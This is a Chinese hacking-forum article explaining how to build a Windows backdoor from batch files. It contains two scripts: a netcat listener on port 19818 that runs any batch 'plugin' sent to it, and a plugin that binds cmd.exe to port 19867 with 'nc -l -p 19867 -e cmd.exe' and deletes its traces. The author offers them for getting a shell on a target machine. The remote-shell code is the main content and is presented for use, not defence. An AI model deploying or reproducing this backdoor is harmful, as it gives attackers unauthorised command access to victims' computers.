发表文章 返回首页

关于构件Bat door 的一些思路和方法

时间:2005-01-17 19:27来源:中国网管联盟 作者:BitsCN整理 点击:
先简单介绍一下批处理文件编写 批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(
   先简单介绍一下批处理文件编写
批处理文件是无格式的文本文件,它包含一条或多条命令。它的文件扩展名为 .bat 或 .cmd。在命令提示下键入批处理文件的名称,或者双击该批处理文件,系统就会调用Cmd.exe按照该文件中各个命令出现的顺序来逐个运行它们。使用批处理文件(也被称为批处理程序或脚本),可以简化日常或重复性任务。
我主要介绍一下批处理来实现简单的后门功能,
以下是一个简单的例子

echo off
:start
nc -vv -l -p 19818 >>shell.bat
find /I "@echo off" shell.bat >>start.bat
if exist start.bat call shell.bat
if exist exit.txt goto start
[/color=Red]
这样就是一个微型的Server端了,关键就在于插件的写法了,我简单的给大家些个正向连接cmdshell的插件做示范吧

@echo off
nc -l -p 19867 -e cmd.exe
cls >>exit.txt
del shell.bat
del start.bat
del exit.txt
[/color=Red]
这个很简陋,只要用nc 把这个提交到目标机的19818端口就可以得到一个正向连接的shell了,用nc连接19867端口看看。至于反弹shell怎么实现,我相信不用写了吧,其实bat的功能还很强大,就看你怎么去写了。上面用判断文件存在的方法其实很笨,一时想不起来命令了,所以用了点笨办法不好意思啦 中国网管联盟www、bitsCN、com
有不明白的地方或则要指教的地方请看留言
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
最新评论 查看所有评论
发表评论 查看所有评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
用户名: 密码: 验证码:
发布者资料
admin 查看详细资料 发送留言 加为好友 用户等级:注册会员 注册时间:2008-05-08 23:05 最后登录:2009-01-05 00:01
推荐内容
  • 整理一些ROOTKIT的资料

    List: 一,前言 二,简介 三,rootkit的一些以公开的隐藏技术 四,一些隐藏技术的应对方...

  • 关于跨域蠕虫的存在

    这几天分析了几个大网站的XSSlt;iframe src=http://www.0×37.com/Project/csrf/do.as...

  • JSP+Oracle SQL Injection之旅

    SQL Injection可谓是长盛不衰的话题了,从ASP+MSSQL到PHP+MYSQL,一路走来也可谓是一...

  • 简述Radmin软件提权技巧

    最近做渗透测试时常碰到RADMIN一类的东西.. 一碰到此类的程序,一般我都会先看下对方把...

  • 简单认识Anti-RootKit

    在RK(rootkit)和ARK(anti-rootkit)的斗争已经进行了很久,在印象中最早出来的ARK工...

  • ASP数据库插马小议

    ASP数据库插马小议 By lake2 ( http://lake2.0x54.org ) 随着技术的发展,ASP数据库...